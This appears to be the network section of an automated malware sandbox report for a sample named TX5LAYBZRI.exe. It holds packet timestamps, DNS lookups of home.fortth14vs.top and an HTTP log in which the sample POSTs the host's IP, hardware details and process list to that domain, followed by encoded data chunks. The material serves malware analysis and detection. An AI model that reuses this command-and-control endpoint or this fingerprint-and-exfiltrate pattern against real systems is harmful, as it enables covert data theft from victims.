Dec 31, 2024 15:47:04.794135094 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.794176102 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.794184923 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.794202089 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.794212103 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.794222116 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
                                          Dec 31, 2024 15:47:04.798057079 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798067093 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798151970 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798161983 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798171997 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798222065 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798232079 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798240900 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798250914 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798285007 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798295975 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.798341990 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798352003 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798383951 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.798408031 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798418045 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798445940 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798455000 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798505068 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798513889 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798547983 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798557043 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798593998 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798604012 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798640013 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798649073 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798676968 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798686028 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798721075 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798729897 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798770905 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798796892 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798806906 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798815966 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798867941 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798877954 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798958063 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798968077 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799019098 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799027920 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799050093 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799058914 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799088955 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799098969 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799134970 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799144983 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799163103 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799171925 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799259901 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799269915 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799278021 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799288034 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799360037 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799370050 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799379110 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803244114 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803288937 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803353071 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803412914 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803489923 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803500891 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.803539038 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803627968 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803637028 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803713083 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803766966 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803824902 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803836107 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803927898 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803937912 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803989887 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803998947 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804059982 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804069996 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804107904 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804117918 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804250956 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804260969 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804269075 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804280043 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804358959 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804368019 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804440022 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804450035 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804496050 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804506063 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804584980 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804594040 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804639101 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804649115 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804687977 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804697990 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804709911 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804769039 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804778099 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804786921 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804805994 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804814100 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804866076 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804874897 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804894924 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804903984 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804913998 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804922104 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804965019 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804975033 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.805025101 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.805033922 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.805042982 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808337927 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808347940 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808389902 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808398962 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808470964 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808480978 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808532000 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808664083 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808737040 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808747053 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808777094 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808785915 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808839083 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808847904 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808890104 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808898926 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808917999 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808927059 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808971882 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808983088 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809016943 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809025049 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809051991 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809061050 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809077978 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809087038 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809132099 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809142113 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809159994 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809169054 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809179068 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809272051 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809281111 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809290886 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809298992 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.851464987 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:06.748404980 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:06.748872995 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:06.753901958 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:06.753957987 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:07.097337008 CET4970780192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:07.102197886 CET804970734.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:07.102277994 CET4970780192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:07.105252028 CET4970780192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:07.110068083 CET804970734.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:07.711004019 CET804970734.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:07.711416960 CET4970780192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:07.716527939 CET804970734.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:07.716634035 CET4970780192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:08.034471989 CET4970880192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:08.039937019 CET804970834.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:08.040009975 CET4970880192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:08.040447950 CET4970880192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:08.046150923 CET804970834.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:08.759886980 CET804970834.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:08.760308027 CET4970880192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:08.765455961 CET804970834.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:08.765511990 CET4970880192.168.2.534.147.147.173
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Dec 31, 2024 15:47:01.249290943 CET  62851  53  192.168.2.5  1.1.1.1
Dec 31, 2024 15:47:01.249356985 CET  62851  53  192.168.2.5  1.1.1.1
Dec 31, 2024 15:47:01.256088972 CET  53  62851  1.1.1.1  192.168.2.5
Dec 31, 2024 15:47:01.256239891 CET  53  62851  1.1.1.1  192.168.2.5
Dec 31, 2024 15:47:03.614389896 CET  62854  53  192.168.2.5  1.1.1.1
Dec 31, 2024 15:47:03.614460945 CET  62854  53  192.168.2.5  1.1.1.1
Dec 31, 2024 15:47:03.621062040 CET  53  62854  1.1.1.1  192.168.2.5
Dec 31, 2024 15:47:03.821193933 CET  53  62854  1.1.1.1  192.168.2.5
Dec 31, 2024 15:47:06.852998018 CET  62856  53  192.168.2.5  1.1.1.1
Dec 31, 2024 15:47:06.853043079 CET  62856  53  192.168.2.5  1.1.1.1
Dec 31, 2024 15:47:07.071731091 CET  53  62856  1.1.1.1  192.168.2.5
Dec 31, 2024 15:47:07.085095882 CET  53  62856  1.1.1.1  192.168.2.5
Dec 31, 2024 15:47:07.760904074 CET  62858  53  192.168.2.5  1.1.1.1
Dec 31, 2024 15:47:07.760943890 CET  62858  53  192.168.2.5  1.1.1.1
Dec 31, 2024 15:47:07.854871035 CET  53  62858  1.1.1.1  192.168.2.5
Dec 31, 2024 15:47:08.033726931 CET  53  62858  1.1.1.1  192.168.2.5
Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
Dec 31, 2024 15:47:01.249290943 CET  192.168.2.5  1.1.1.1  0xca9b  Standard query (0)  httpbin.org  A (IP address)  IN (0x0001)  false
Dec 31, 2024 15:47:01.249356985 CET  192.168.2.5  1.1.1.1  0x213a  Standard query (0)  httpbin.org  28  IN (0x0001)  false
Dec 31, 2024 15:47:03.614389896 CET  192.168.2.5  1.1.1.1  0xc753  Standard query (0)  home.fortth14vs.top  A (IP address)  IN (0x0001)  false
Dec 31, 2024 15:47:03.614460945 CET  192.168.2.5  1.1.1.1  0xb676  Standard query (0)  home.fortth14vs.top  28  IN (0x0001)  false
Dec 31, 2024 15:47:03.627711058 CET  192.168.2.5  1.1.1.1  0xb676  Standard query (0)  home.fortth14vs.top  28  IN (0x0001)  false
Dec 31, 2024 15:47:06.852998018 CET  192.168.2.5  1.1.1.1  0x93ae  Standard query (0)  home.fortth14vs.top  A (IP address)  IN (0x0001)  false
Dec 31, 2024 15:47:06.853043079 CET  192.168.2.5  1.1.1.1  0xf89b  Standard query (0)  home.fortth14vs.top  28  IN (0x0001)  false
Dec 31, 2024 15:47:07.760904074 CET  192.168.2.5  1.1.1.1  0xf2a  Standard query (0)  home.fortth14vs.top  A (IP address)  IN (0x0001)  false
Dec 31, 2024 15:47:07.760943890 CET  192.168.2.5  1.1.1.1  0xa6b5  Standard query (0)  home.fortth14vs.top  28  IN (0x0001)  false
Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class  DNS over HTTPS
Dec 31, 2024 15:47:01.256239891 CET  1.1.1.1  192.168.2.5  0xca9b  No error (0)  httpbin.org    34.200.57.114  A (IP address)  IN (0x0001)  false
Dec 31, 2024 15:47:01.256239891 CET  1.1.1.1  192.168.2.5  0xca9b  No error (0)  httpbin.org    34.197.122.172  A (IP address)  IN (0x0001)  false
Dec 31, 2024 15:47:03.821193933 CET  1.1.1.1  192.168.2.5  0xc753  No error (0)  home.fortth14vs.top    34.147.147.173  A (IP address)  IN (0x0001)  false
Dec 31, 2024 15:47:07.071731091 CET  1.1.1.1  192.168.2.5  0x93ae  No error (0)  home.fortth14vs.top    34.147.147.173  A (IP address)  IN (0x0001)  false
Dec 31, 2024 15:47:07.854871035 CET  1.1.1.1  192.168.2.5  0xf2a  No error (0)  home.fortth14vs.top    34.147.147.173  A (IP address)  IN (0x0001)  false
                                          • httpbin.org
                                          • home.fortth14vs.top
Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.2.5  49706  34.147.147.173  80  7088  C:\Users\user\Desktop\TX5LAYBZRI.exe
Timestamp  Bytes transferred  Direction  Data
Dec 31, 2024 15:47:04.337905884 CET  12360  OUT  POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                          Host: home.fortth14vs.top
                                          Accept: */*
                                          Content-Type: application/json
                                          Content-Length: 502080
                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 37 38 33 31 36 35 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "8428488241957831653", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe" [TRUNCATED]
Dec 31, 2024 15:47:04.342936993 CET  9888  OUT  Data Raw: 62 2b 4b 5c 2f 30 61 5c 2f 47 33 77 50 79 7a 4b 73 34 38 55 75 42 73 52 77 70 6c 75 64 34 36 70 6c 75 56 34 71 72 6e 58 44 57 61 78 78 57 4e 70 59 65 57 4b 71 55 46 44 49 73 35 7a 53 72 53 61 77 38 5a 56 46 4f 76 54 70 55 35 4a 4e 52 6e 4b 57 68
                                          Data Ascii: b+K\/0a\/G3wPyzKs48UuBsRwplud46pluV4qrnXDWaxxWNpYeWKqUFDIs5zSrSaw8ZVFOvTpU5JNRnKWh5\/RT2XHI6fyplf0CfhgUUUUGlPr8v1IXj5D+\/+f1\/z6NqxX7B\/wDBMb9iX4Ifta+D\/itqfxYi8WC+8E+I\/DdhpE\/hfxCujGS01vTdSuLiK+jnsNShm8mbTEa2eKK3kX7RcLO86+QsH5\/4meJGR+FXC1bi
Dec 31, 2024 15:47:04.342978001 CET  4944  OUT  Data Raw: 2f 34 76 38 4f 65 45 4c 47 7a 38 52 61 33 72 66 78 36 2b 49 64 6c 4b 76 68 38 61 34 62 33 54 37 73 65 48 5a 4e 53 61 43 33 5c 2f 41 4c 49 61 39 53 78 61 33 2b 78 5c 2f 7a 62 56 5c 2f 54 37 2b 30 62 38 56 74 4d 2b 4d 48 5c 2f 42 4c 76 39 70 62 78
                                          Data Ascii: /4v8OeELGz8Ra3rfx6+IdlKvh8a4b3T7seHZNSaC3\/ALIa9Sxa3+x\/zbV\/T7+0b8VtM+MH\/BLv9pbxLpP7QX\/DSVvY+OfA2hP45\/4VRcfB7+yprb4hfBXUG8Kf8Izc6dpj332GPU49Y\/t0QOlz\/bv9niZjpjJH\/MN5fv8Ap\/8AXr\/V\/wCgfmOLxfAvGGFqYrEVcFg+IsJPA4WrXdajg\/rmA9piVhoqpVpUo16s
Dec 31, 2024 15:47:04.343005896 CET  4944  OUT  Data Raw: 44 6a 2b 78 74 46 30 6a 77 5c 2f 5a 36 59 4a 6b 31 57 39 31 66 77 37 46 59 36 52 59 32 63 46 77 31 6a 61 33 47 69 33 64 7a 4f 77 7a 42 63 33 7a 71 72 53 70 63 4b 74 76 74 56 2b 6d 50 69 58 52 39 4b 54 77 33 72 63 63 57 6e 32 6c 75 72 57 56 37 4b
                                          Data Ascii: Dj+xtF0jw\/Z6YJk1W91fw7FY6RY2cFw1ja3Gi3dzOwzBc3zqrSpcKtvtV+mPiXR9KTw3rccWn2lurWV7Kfs0EdsTLIjNJITAsZZ5GJZ2bJdiS2Sa\/PyfQUwWt5ymMnbMMr\/38UAqB7oxx1Pr\/J2e+J2QcV53jM0oZOuF6GJnT9nl9J\/WcNR5KFGjKbxFKEJTrYidOWJxVWWGoxnXrVKjV5SZ\/buS+EXFHCWQYDK6+c0+L
Dec 31, 2024 15:47:04.346297979 CET  4944  OUT  Data Raw: 5c 2f 7a 38 5c 2f 35 5c 2f 77 44 72 55 48 52 54 36 5c 2f 4c 39 53 48 7a 4f 76 38 66 36 5a 39 71 59 71 78 73 79 53 50 38 41 35 5c 2f 30 62 5c 2f 77 43 74 55 32 33 2b 42 38 66 7a 34 5c 2f 38 41 72 5a 5c 2f 4c 38 61 68 5c 2f 32 5c 2f 38 41 6c 6e 5c
                                          Data Ascii: \/z8\/5\/wDrUHRT6\/L9SHzOv8f6Z9qYqxsySP8A5\/0b\/wCtU23+B8fz4\/8ArZ\/L8ah\/2\/8Aln\/9f8+nH1460HYQ\/eX5\/TpHz\/n2\/HioW\/ubfpn+f+T9e9XJE+VPk\/795\/p6fX\/68MYT53\/j\/wCWv+f8\/rQVS6f4f8iHy\/8ApjUUn58eb\/retSyH\/Y2f9dJf16f5x0pn9xNsfPXt5P0oO4hk2fI\/
Dec 31, 2024 15:47:04.347780943 CET  4944  OUT  Data Raw: 62 66 45 44 77 46 6f 47 70 61 6e 66 7a 61 62 70 48 67 5c 2f 34 76 38 41 67 76 55 66 44 58 78 58 38 48 76 70 6d 6c 58 63 65 6e 32 38 58 68 33 78 76 62 61 58 62 65 52 47 73 64 6a 4c 62 78 4c 45 66 69 44 77 7a 72 6b 48 69 58 54 66 42 75 75 32 75 70
                                          Data Ascii: bfEDwFoGpanfzabpHg\/4v8AgvUfDXxX8HvpmlXcen28Xh3xvbaXbeRGsdjLbxLEfiDwzrkHiXTfBuu2upeF7Xw14o8KfGPxTq\/im81TXf7A+Gv\/AAoSaSP4n+HviVPbeFLm80XxRokd54PuLTStFsfEf9uj4kfD200Oe\/1XxLBp8XR3t58PLb4IfEz472f7Q\/7P2q+HfhJ4R8JeKPGmgRH9pbR\/EVrqHjzUE0bwZ4B0++
Dec 31, 2024 15:47:04.347814083 CET  2472  OUT  Data Raw: 4b 44 62 77 51 50 47 77 38 4e 5a 38 54 5c 2f 38 41 43 30 42 34 6d 4f 6d 5c 2f 38 49 35 34 76 30 44 78 61 69 6a 52 66 2b 46 65 65 48 76 74 58 32 32 54 51 55 30 39 6e 5c 2f 74 61 33 2b 79 70 64 4e 64 68 4c 6c 6f 42 62 54 66 6a 62 56 67 57 58 32 66
                                          Data Ascii: KDbwQPGw8NZ8T\/8AC0B4mOm\/8I54v0DxaijRf+FeeHvtX22TQU09n\/ta3+ypdNdhLloBbTfjbVgWX2fxBf6Xr\/ij4eeEPDXh\/wCEXwd+Nfjb4neKPEeu2nw98BeEfj14U03xb8LtL8QT6d4O1XxhrPjrxPa6nHp+m+Avh34N8d+KNUvLLW73Q9O1fw54d1\/XdMxm1fQ5vEN9o3h7xd4O+IGlW9jaajYeNPAV54mn8Naxb
Dec 31, 2024 15:47:04.347836971 CET  4944  OUT  Data Raw: 64 71 73 79 65 64 74 38 6d 62 43 66 76 51 66 33 66 37 69 2b 5c 2f 77 43 76 72 30 78 2b 48 59 55 7a 2b 38 45 39 5c 2f 73 73 6e 39 4d 66 35 37 55 47 68 44 39 32 52 50 6b 32 66 2b 31 52 5c 2f 6e 5c 2f 4a 7a 54 4a 49 33 32 6f 72 5c 2f 41 47 66 36 2b
                                          Data Ascii: dqsyedt8mbCfvQf3f7i+\/wCvr0x+HYUz+8E9\/ssn9Mf57UGhD92RPk2f+1R\/n\/JzTJI32or\/AGf6+X+vr+NPkzJHvd\/9ZL\/5Mf8AT37f\/WpV\/wBXsTzP3kv7z\/Pt7fWuc6Cq+\/y32Jv\/AHvX\/nt\/9f8ADntzTPut8sez975v+t9M9vf8Ks\/dwf4\/9Vnt\/n3qs0fm\/Ij\/ACeb\/rOv4frQaU+vy\/Uhj2
                                          Dec 31, 2024 15:47:04.347860098 CET | 2472 | OUT | Data Raw: 6c 66 59 39 76 70 57 6b 4a 46 4c 42 46 70 4f 6d 78 51 79 6b 6d 61 47 4f 78 74 55 69 6c 4a 4f 53 5a 49 31 69 43 75 53 53 54 6c 67 63 6e 4a 50 4e 56 5c 2f 77 44 68 46 76 44 48 5c 2f 51 75 61 44 5c 2f 34 4a 39 50 38 41 5c 2f 6b 65 70 77 6e 30 54 63
                                          Data Ascii: lfY9vpWkJFLBFpOmxQykmaGOxtUilJOSZI1iCuSSTlgcnJPNV\/wDhFvDH\/QuaD\/4J9P8A\/kepwn0TcLg8RHEx43zOuq+aZTnma4erl2VrC5rmmQ4PFYDJ62Kw6wksPUoYLB1cDShQ9jFc2RZFiacqeNy+GKl0Vvp04+s6c\/8AiG+SYbE5fgM0yjI8bSzXPXjsnyzPcxwWaZzRw2O\/tKlmCr43FYbGReJeMlNYTO87wUva
                                          Dec 31, 2024 15:47:04.391623020 CET | 34608 | OUT | Data Raw: 74 4e 30 44 78 42 34 34 4e 78 34 70 6b 4d 71 6e 78 46 6f 76 30 4e 70 66 67 4c 77 66 6f 73 49 67 30 7a 77 35 6f 39 74 47 46 43 41 66 59 59 5a 6e 32 4c 79 46 38 32 34 45 73 75 30 48 6e 42 66 47 65 65 74 64 41 64 4e 73 54 47 73 52 74 4c 55 78 49 78
